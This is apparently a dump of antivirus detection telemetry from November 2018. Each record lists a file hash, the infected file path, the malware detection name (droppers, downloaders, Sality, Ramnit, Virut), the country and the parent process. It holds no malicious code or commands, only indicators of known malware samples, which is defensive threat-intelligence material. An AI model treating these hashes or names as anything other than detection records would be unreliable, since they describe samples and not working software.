  Row(detection=Row(filename='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C31A9CBFC6550F82BDCEF0125262CB6D97BD4F40AEF977F4D78DD54DC0D5101', filesize=1156000, name='PUA/SoftPulse.oant.#M1.#R1'), hash='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:57:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\ksII\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='1c34853a7fb0986859e6d0202e4a093042e32773aaf7903ce2012434a0ebefc9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\ksII\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='1c34853a7fb0986859e6d0202e4a093042e32773aaf7903ce2012434a0ebefc9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:13:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C3BEDF1D1214363AC3582E2DF3F1E5E592BA8636E8480767D90BE1867AD6D1B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C3BEDF1D1214363AC3582E2DF3F1E5E592BA8636E8480767D90BE1867AD6D1B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C3BEDF1D1214363AC3582E2DF3F1E5E592BA8636E8480767D90BE1867AD6D1B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maps.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\MAPS\\MAPS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1c5eb2619262d5e3ad6cf9bb4b426c77f5fae858e22fa503d330aa1a94b6b8e7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gamelogic.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\gamelogic\\gamelogic.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1c5eb2619262d5e3ad6cf9bb4b426c77f5fae858e22fa503d330aa1a94b6b8e7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='docs.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\DOCS\\DOCS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1c5eb2619262d5e3ad6cf9bb4b426c77f5fae858e22fa503d330aa1a94b6b8e7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sentstrt.exe', filepath='\\?\\G:\\PLC程式\\GT-WORKS\\SoftGOT\\SystemDriver5382G\\Win_9x\\sentstrt.exe', filesize=256000, name='W32/Jadtre.K.#M1.#R1'), hash='1c8effe47d47beec4830b1eac5c70d12faeed6d9f77dd0e055ce5acc523c0cf1', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:29:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1CB6DF2BF5442042F20DFA273E9C2C75AC04DC98852235F9CCB77FD7ECA3EDDF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1CB6DF2BF5442042F20DFA273E9C2C75AC04DC98852235F9CCB77FD7ECA3EDDF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1CB6DF2BF5442042F20DFA273E9C2C75AC04DC98852235F9CCB77FD7ECA3EDDF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sqldumper.exe', filepath='C:\\Program Files (x86)\\Microsoft SQL Server\\100\\Shared\\SqlDumper.exe', filesize=156000, name='W32/Sality.AT.#M1.#R1'), hash='1cc709f4fad05836407c8cf12ea1fb2ef34da9698a0ea78771b51e209150b739', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T06:44:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='TR/SPY.25270.1.#M1.#R1'), hash='1d0715a5b5f757f80135adf6b24c369817c2d7c31b1717bc980ed7ea7c1a6057', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='netinfoplugin.dll', filepath='C:\\Program Files\\3G ALWA\\NetInfoPlugin.dll', filesize=324000, name='W32/Ramnit.C.#M1.#R1'), hash='1d18f09189c3ad3998ccac4c4b6778b39f3757af0a1ceaf1c5f0859274b20c16', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T14:42:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D2685E4ACE3FB52FB99BF29DD0892B348C2ED611A6C8221B3FE1DC9A3987612', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:29:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D2685E4ACE3FB52FB99BF29DD0892B348C2ED611A6C8221B3FE1DC9A3987612', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:37:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D2685E4ACE3FB52FB99BF29DD0892B348C2ED611A6C8221B3FE1DC9A3987612', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:58:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='1d2fdab4c416e82f199dddbdea045bf86a6c7fc1a38cbc3c6661975aeadb8c28', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:24:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d56d1baa6eebb29cbf977a6463cc935536dd10feb80ea6f83c4006de1bf6632.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\18.03.2018-296.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\1d56d1baa6eebb29cbf977a6463cc935536dd10feb80ea6f83c4006de1bf6632.MRG', filesize=704000, name='HEUR/AGEN.1032585.#M1.#R1'), hash='1d56d1baa6eebb29cbf977a6463cc935536dd10feb80ea6f83c4006de1bf6632', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\18.04.2018-108.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T15:02:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1dadf2f6c363147e08ef2895c70a4861fb47b9823de978a0f007a04e8c136994', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1dadf2f6c363147e08ef2895c70a4861fb47b9823de978a0f007a04e8c136994', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1DEBB93DB3C877B426D5B68A2574174410142B3B334DBD91F959D48322DFAB6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1DEBB93DB3C877B426D5B68A2574174410142B3B334DBD91F959D48322DFAB6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1DEBB93DB3C877B426D5B68A2574174410142B3B334DBD91F959D48322DFAB6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cleanmgr.exe', filepath='H:\\TAILIEUCU\\KHONG DUOC XOA\\O C\\WINDOWS\\system32\\dllcache\\cleanmgr.exe', filesize=64000, name='TR/Crypt.XPACK.Gen2.#M300.#R100299'), hash='1df818743f3c66e8d5af1fa2d651d543d0d126bbf2aaca8492d7c2aa4458b512', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T09:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jkh.open.info.doc.warm.xls', filepath='E:\\FreeFiles\\Женя\\рабочий стол\\повторно загруженные\\JKH.OPEN.INFO.DOC.WARM.xls', filesize=1856000, name='W97M/Agent.4231.#M1.#R1'), hash='1e21e8e58c0739de40264d755183cc1b607b20080e4cc7db80c349a2836cf130', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:11:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=960000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='1e9f578de8dd27f6c1cddbc8ccb787323dd0fb7bd5d1f5a800f3f9ef0cede19d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T01:00:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1f06e353466caf56f94fcd51601058b7064dd9dca386e84e4636a7e8a661078f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2640896, timestamp='2018-11-02T13:17:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1f06e353466caf56f94fcd51601058b7064dd9dca386e84e4636a7e8a661078f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T16:22:08Z'), dt=datetime.date(2018, 11, 2)),
